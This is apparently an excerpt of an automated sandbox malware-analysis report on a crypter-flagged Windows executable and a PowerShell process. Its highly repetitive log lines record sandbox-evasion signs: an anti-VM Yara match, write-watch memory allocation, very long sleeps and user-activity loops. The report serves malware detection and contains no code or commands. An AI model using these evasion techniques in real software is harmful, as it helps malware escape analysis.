Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 1280000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 2D10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 2B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 7E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 8E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 8FD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 9FD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 2BC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Memory allocated: 4BC0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599773 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598577 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596276 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 594640 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5815 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3930 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Window / User API: threadDelayed 7912 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Window / User API: threadDelayed 1956 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -27670116110564310s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7780 Thread sleep count: 7912 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7780 Thread sleep count: 1956 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599773s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598577s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -597046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596276s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -596062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -595078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -594968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -594859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -594750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe TID: 7776 Thread sleep time: -594640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599773 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Thread delayed: delay time: 599015 Jump to behavior
